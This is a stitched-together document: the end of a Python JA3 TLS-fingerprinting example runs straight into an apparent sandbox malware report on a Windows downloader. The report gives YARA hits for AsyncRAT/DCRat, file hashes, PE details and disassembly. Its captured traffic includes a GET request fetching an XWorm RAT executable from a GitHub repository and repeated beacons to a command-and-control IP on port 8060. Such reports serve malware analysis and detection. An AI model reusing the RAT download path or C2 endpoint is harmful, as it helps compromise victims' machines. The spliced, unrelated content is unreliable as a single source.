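# Constructed sample: TLS 1.2 handshake version, two TLS 1.3 suites, one ECDHE suite and a GREASE
# suite; SNI, supported_groups (with a GREASE group), ec_point_formats, signature_algorithms and
# supported_versions. Extension payloads other than types 10 and 11 do not influence JA3.
SAMPLE_CLIENT_HELLO = build_client_hello(
    0x0303,
    [0x1301, 0x1302, 0xC02B, 0x0A0A],
    [
        (0, b"\x00\x00"),
        supported_groups_ext([0x001D, 0x0017, 0x2A2A]),
        ec_point_formats_ext([0]),
        (13, b"\x00\x02\x04\x03"),
        (43, b"\x02\x03\x04"),
    ],
)

if __name__ == "__main__":
    print(*ja3_from_client_hello(SAMPLE_CLIENT_HELLO))
```

                               Because the string is built in ClientHello order and then hashed, two clients that send the same suites and extensions in a different order get different JA3 values, and a client that randomises extension order will not match a table like the one above from one connection to the next.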
                                                  No context
                                                   Process: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                   File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                   Category: dropped
                                                   Size (bytes): 49152
                                                   Entropy (8bit): 5.623796350941972
                                                   Encrypted: false
                                                   SSDEEP: 768:SlV/w9ILiCuu+bi9telDSN+iV08YbygeQ5TQBJFvEgK/Jq0Vc6KN:SlV/Ii9tKDs4zb1qBJFnkJq0VclN
                                                   MD5: 2C417B524AED1DA84F185711E5A478F1
                                                   SHA1: 48380B5CD38EB374F4B439552E84BCA400D2008B
                                                   SHA-256: 8B703CD3353CA564A01BA71E1BD9A60F8DC0FA3AC8E93747A5ADCDB04CE7C79B
                                                   SHA-512: 2032760A9625B3862DEAD17143BDC35926A68D7054BA96159123FC45E8EC12553E0C4FF8808F1ECC71EE3660B0C4BBC95B137363B4B5CD94D2E86DD7BFC4EB23
                                                   Malicious: true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding base64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\XWormUI[1].exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
• Antivirus: Virustotal, Detection: 72%
                                                  Reputation:low
                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):49152
                                                  Entropy (8bit):5.623796350941972
                                                  Encrypted:false
                                                  SSDEEP:768:SlV/w9ILiCuu+bi9telDSN+iV08YbygeQ5TQBJFvEgK/Jq0Vc6KN:SlV/Ii9tKDs4zb1qBJFnkJq0VclN
                                                  MD5:2C417B524AED1DA84F185711E5A478F1
                                                  SHA1:48380B5CD38EB374F4B439552E84BCA400D2008B
                                                  SHA-256:8B703CD3353CA564A01BA71E1BD9A60F8DC0FA3AC8E93747A5ADCDB04CE7C79B
                                                  SHA-512:2032760A9625B3862DEAD17143BDC35926A68D7054BA96159123FC45E8EC12553E0C4FF8808F1ECC71EE3660B0C4BBC95B137363B4B5CD94D2E86DD7BFC4EB23
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: unknown
• Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding base64-encoded APIs, command lines, registry keys, etc., Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
• Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attempting to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 96%
• Antivirus: Virustotal, Detection: 72%
                                                  Reputation:low
                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                  Entropy (8bit):5.4183837941963615
                                                  TrID:
                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                  • DOS Executable Generic (2002/1) 0.92%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                  File size:30'208 bytes
                                                  MD5:e40eb702f369e5decfb33b3d78bd4b0c
                                                  SHA1:3de25a909a7d8f20aaa4d9aba60aeb501c247f86
                                                  SHA256:16a2abe3f4f2c005e206318caf37a366e0084fa8ca8561f3642fa0b4f2f04a7e
                                                  SHA512:d015925072810f6ec5044ead32efc8ed6bee2d533c39915ceb526edce20edbc7fd3447423bd6ec608478eb87fdc70c9ad6dcce8b00b8328206adc9294137b60f
                                                  SSDEEP:384:pWIooQkbZYGM0D4DTrMiRShFRDwSH3I6ELjTo0z2d6GHnGtI4qk9QlEM69+j5P0u:nQFGM0D4DKF9wHmhAvP9Ql369aR0
                                                  TLSH:BBD22A67276904ECE236937C85A35A16DAB2BC610742E3CF43A192060F377D1EEBDE11
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x140003848
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x140000000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x66CBB578 [Sun Aug 25 22:51:36 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:6
                                                  OS Version Minor:0
                                                  File Version Major:6
                                                  File Version Minor:0
                                                  Subsystem Version Major:6
                                                  Subsystem Version Minor:0
                                                  Import Hash:8c6422f99cddde5bd8d239051984ad7a
                                                  Instruction
                                                  dec eax
                                                  sub esp, 28h
                                                  call 00007F4A68E09890h
                                                  dec eax
                                                  add esp, 28h
                                                  jmp 00007F4A68E08FFFh
                                                  int3
                                                  int3
                                                  retn 0000h
                                                  int3
                                                  inc eax
                                                  push ebx
                                                  dec eax
                                                  sub esp, 20h
                                                  dec eax
                                                  mov ebx, ecx
                                                  xor ecx, ecx
                                                  call dword ptr [000017E7h]
                                                  dec eax
                                                  mov ecx, ebx
                                                  call dword ptr [000017D6h]
                                                  call dword ptr [000017E0h]
                                                  dec eax
                                                  mov ecx, eax
                                                  mov edx, C0000409h
                                                  dec eax
                                                  add esp, 20h
                                                  pop ebx
                                                  dec eax
                                                  jmp dword ptr [000017D4h]
                                                  dec eax
                                                  mov dword ptr [esp+08h], ecx
                                                  dec eax
                                                  sub esp, 38h
                                                  mov ecx, 00000017h
                                                  call dword ptr [000017C8h]
                                                  test eax, eax
                                                  je 00007F4A68E09189h
                                                  mov ecx, 00000002h
                                                  int 29h
                                                  dec eax
                                                  lea ecx, dword ptr [00004BA6h]
                                                  call 00007F4A68E0922Eh
                                                  dec eax
                                                  mov eax, dword ptr [esp+38h]
                                                  dec eax
                                                  mov dword ptr [00004C8Dh], eax
                                                  dec eax
                                                  lea eax, dword ptr [esp+38h]
                                                  dec eax
                                                  add eax, 08h
                                                  dec eax
                                                  mov dword ptr [00004C1Dh], eax
                                                  dec eax
                                                  mov eax, dword ptr [00004C76h]
                                                  dec eax
                                                  mov dword ptr [00004AE7h], eax
                                                  dec eax
                                                  mov eax, dword ptr [esp+40h]
                                                  dec eax
                                                  mov dword ptr [00004BEBh], eax
                                                  mov dword ptr [00004AC1h], C0000409h
                                                  mov dword ptr [00004ABBh], 00000001h
                                                  mov dword ptr [00004AC5h], 00000001h
                                                  Programming Language:
                                                  • [IMP] VS2008 SP1 build 30729
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6a04           0x104         .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xa000           0x1e0         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x9000           0x4ec         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xb000           0x98          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x5860           0x70          .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x5720           0x140         .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x5000           0x390         .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Sections (Name, Virtual Address, Virtual Size, Raw Size, MD5, Xored PE, ZLIB Complexity, File Type, Entropy, Characteristics):
.text: Virtual Address 0x1000, Virtual Size 0x3607, Raw Size 0x3800, MD5 c5d519969ef7ccd91fdba2ba5d95fa65, Xored PE False, ZLIB Complexity 0.5693359375, File Type data, Entropy 5.977785649593961, Characteristics IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata: Virtual Address 0x5000, Virtual Size 0x2b32, Raw Size 0x2c00, MD5 51da2f7cabe90f973696afbdc419d989, Xored PE False, ZLIB Complexity 0.36585582386363635, File Type data, Entropy 4.3376170534768335, Characteristics IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data: Virtual Address 0x8000, Virtual Size 0x9e8, Raw Size 0x400, MD5 2896e51644f1191532b8da845f373c6f, Xored PE False, ZLIB Complexity 0.2216796875, File Type DOS executable (block device driver), Entropy 3.122970109830986, Characteristics IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata: Virtual Address 0x9000, Virtual Size 0x4ec, Raw Size 0x600, MD5 42efbae0755965d87bd10dca4fa9ce3b, Xored PE False, ZLIB Complexity 0.419921875, File Type data, Entropy 3.6349355706670803, Characteristics IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc: Virtual Address 0xa000, Virtual Size 0x1e0, Raw Size 0x200, MD5 101f04294dcfeea9dfe10d3c920461d9, Xored PE False, ZLIB Complexity 0.529296875, File Type data, Entropy 4.701503258251789, Characteristics IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc: Virtual Address 0xb000, Virtual Size 0x98, Raw Size 0x200, MD5 10b3f866dcc8ac3591768175d184eb7e, Xored PE False, ZLIB Complexity 0.287109375, File Type data, Entropy 2.0982991704247644, Characteristics IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Resources (Name, RVA, Size, Type, Language, Country, ZLIB Complexity):
RT_MANIFEST: RVA 0xa060, Size 0x17d, Type XML 1.0 document, ASCII text, with CRLF line terminators, Language English, Country United States, ZLIB Complexity 0.5931758530183727
DLL: Imports
KERNEL32.dll: CloseHandle, CreateProcessW, GetExitCodeProcess, RtlLookupFunctionEntry, Sleep, OpenProcess, GetFileAttributesW, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlCaptureContext
ADVAPI32.dll: GetUserNameW
MSVCP140.dll: ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD@Z, ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?showmanyc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JXZ, ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J@Z, ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J@Z, ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ, ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ, ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@PEBD_J@Z, ?always_noconv@codecvt_base@std@@QEBA_NXZ, ??Bid@locale@std@@QEAA_KXZ, ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z, ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ, ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD@Z, ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEBA?AVlocale@2@XZ, ??1_Lockit@std@@QEAA@XZ, ??0_Lockit@std@@QEAA@H@Z, ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12@XZ, ?id@?$codecvt@DDU_Mbstatet@@@std@@2V0locale@2@A, ?_Fiopen@std@@YAPEAU_iobuf@@PEB_WHH@Z, ?_Xlength_error@std@@YAXPEBD@Z, ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@@Z, ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ
WININET.dll: InternetOpenUrlW, InternetReadFile, InternetCloseHandle, InternetOpenW
VCRUNTIME140_1.dll: __CxxFrameHandler4
VCRUNTIME140.dll: memmove, memset, __current_exception_context, __current_exception, _CxxThrowException, __C_specific_handler, __std_terminate, __std_exception_copy, __std_exception_destroy, memcpy
api-ms-win-crt-stdio-l1-1-0.dll: fwrite, setvbuf, ungetc, fgetc, fclose, fflush, fputc, fgetpos, fread, __p__commode, _get_stream_buffer_pointers, _set_fmode, _fseeki64, fsetpos
api-ms-win-crt-filesystem-l1-1-0.dll: _lock_file, _unlock_file
api-ms-win-crt-runtime-l1-1-0.dll: _initterm, _initterm_e, exit, _exit, _invalid_parameter_noinfo_noreturn, _c_exit, _set_app_type, _get_narrow_winmain_command_line, terminate, _crt_atexit, _configure_narrow_argv, _initialize_narrow_environment, _cexit, _seh_filter_exe, _register_thread_local_exe_atexit_callback, _initialize_onexit_table, _register_onexit_function
api-ms-win-crt-heap-l1-1-0.dll: malloc, _callnewh, free, _set_new_mode
api-ms-win-crt-math-l1-1-0.dll: __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll: _configthreadlocale
Language of compilation system: English
Country where language is spoken: United States
Timestamp, Source Port, Dest Port, Source IP, Dest IP
                                                  Sep 30, 2024 03:24:09.929100990 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929164886 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929167986 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929184914 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929241896 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929241896 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929263115 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929316044 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.929327011 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.929374933 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.983901978 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.984028101 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.984096050 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.984126091 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990436077 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990474939 CEST44349712185.199.111.133192.168.2.6
                                                  Sep 30, 2024 03:24:09.990498066 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:09.990540981 CEST49712443192.168.2.6185.199.111.133
                                                  Sep 30, 2024 03:24:14.306224108 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.311126947 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:14.311244011 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.331377029 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:14.338675022 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:35.758866072 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:35.759006977 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.785727978 CEST497138060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.786623955 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.790534019 CEST80604971337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:40.791376114 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:24:40.791460037 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.791933060 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:24:40.796677113 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:02.162817955 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:02.162889004 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.174518108 CEST497208060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.174873114 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.179544926 CEST80604972037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:07.179675102 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:07.179740906 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.180074930 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:07.184822083 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:28.554006100 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:28.554090023 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.565084934 CEST628998060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.565479994 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.570044994 CEST80606289937.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:33.570394039 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:33.570513964 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.570909977 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:33.575761080 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:54.946281910 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:54.947144985 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.987008095 CEST629018060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.987312078 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.991935968 CEST80606290137.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:59.992088079 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:25:59.992161036 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.992518902 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:25:59.997253895 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:21.351495028 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:21.351603031 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.361913919 CEST629038060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.362251997 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.366806984 CEST80606290337.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:26.366995096 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:26.367082119 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.367413998 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:26.372148991 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:47.757034063 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:47.757118940 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.768074036 CEST629048060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.768457890 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.772995949 CEST80606290437.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:52.773359060 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:26:52.773432970 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.773864985 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:26:52.778631926 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109146118 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109220028 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109282970 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109390974 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:15.109415054 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:15.109415054 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:15.109448910 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.111927986 CEST629068060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.112298965 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.116839886 CEST80606290637.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:20.117235899 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:20.117311001 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.117793083 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:20.125153065 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:41.493908882 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:41.494018078 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.502496004 CEST629078060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.502876043 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.507380962 CEST80606290737.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:46.507678032 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:27:46.509310961 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.509643078 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:27:46.514379025 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:07.886933088 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:07.887048006 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.893217087 CEST629088060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.893661022 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.898072004 CEST80606290837.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:12.898521900 CEST80606291037.18.62.18192.168.2.6
                                                  Sep 30, 2024 03:28:12.898597956 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.898907900 CEST629108060192.168.2.637.18.62.18
                                                  Sep 30, 2024 03:28:12.903711081 CEST80606291037.18.62.18192.168.2.6
                                                   Timestamp                             Source Port  Dest Port  Source IP     Dest IP
                                                   Sep 30, 2024 03:24:07.939327955 CEST  56227        53         192.168.2.6   1.1.1.1
                                                   Sep 30, 2024 03:24:07.946080923 CEST  53           56227      1.1.1.1       192.168.2.6
                                                   Sep 30, 2024 03:24:09.124011040 CEST  64211        53         192.168.2.6   1.1.1.1
                                                   Sep 30, 2024 03:24:09.130640984 CEST  53           64211      1.1.1.1       192.168.2.6
                                                   Sep 30, 2024 03:24:50.493774891 CEST  53           49844      162.159.36.2  192.168.2.6
                                                   Sep 30, 2024 03:24:51.836352110 CEST  53           50805      1.1.1.1       192.168.2.6
                                                   Timestamp                             Source IP    Dest IP  Trans ID  OP Code             Name                       Type            Class        DNS over HTTPS
                                                   Sep 30, 2024 03:24:07.939327955 CEST  192.168.2.6  1.1.1.1  0xd90c    Standard query (0)  github.com                 A (IP address)  IN (0x0001)  false
                                                   Sep 30, 2024 03:24:09.124011040 CEST  192.168.2.6  1.1.1.1  0x12      Standard query (0)  raw.githubusercontent.com  A (IP address)  IN (0x0001)  false
                                                   Timestamp                             Source IP  Dest IP      Trans ID  Reply Code    Name                       CName  Address          Type            Class        DNS over HTTPS
                                                   Sep 30, 2024 03:24:07.946080923 CEST  1.1.1.1    192.168.2.6  0xd90c    No error (0)  github.com                        140.82.121.3     A (IP address)  IN (0x0001)  false
                                                   Sep 30, 2024 03:24:09.130640984 CEST  1.1.1.1    192.168.2.6  0x12      No error (0)  raw.githubusercontent.com         185.199.111.133  A (IP address)  IN (0x0001)  false
                                                   Sep 30, 2024 03:24:09.130640984 CEST  1.1.1.1    192.168.2.6  0x12      No error (0)  raw.githubusercontent.com         185.199.109.133  A (IP address)  IN (0x0001)  false
                                                   Sep 30, 2024 03:24:09.130640984 CEST  1.1.1.1    192.168.2.6  0x12      No error (0)  raw.githubusercontent.com         185.199.110.133  A (IP address)  IN (0x0001)  false
                                                   Sep 30, 2024 03:24:09.130640984 CEST  1.1.1.1    192.168.2.6  0x12      No error (0)  raw.githubusercontent.com         185.199.108.133  A (IP address)  IN (0x0001)  false
                                                  • github.com
                                                  • raw.githubusercontent.com
                                                   Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                   0           192.168.2.6  49710        140.82.121.3    443               4976  C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.27060.22350.exe
                                                   Timestamp                Bytes transferred  Direction  Data
                                                   2024-09-30 01:24:08 UTC  157                OUT        GET /errias/XWorm-Rat-Remote-Administration-Tool-/raw/main/XWormUI.exe HTTP/1.1
                                                  User-Agent: ProgramDownloader
                                                  Host: github.com
                                                  Cache-Control: no-cache
                                                   2024-09-30 01:24:09 UTC  576                IN         HTTP/1.1 302 Found
                                                  Server: GitHub.com
                                                  Date: Mon, 30 Sep 2024 01:24:08 GMT
                                                  Content-Type: text/html; charset=utf-8
                                                  Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                  Access-Control-Allow-Origin:
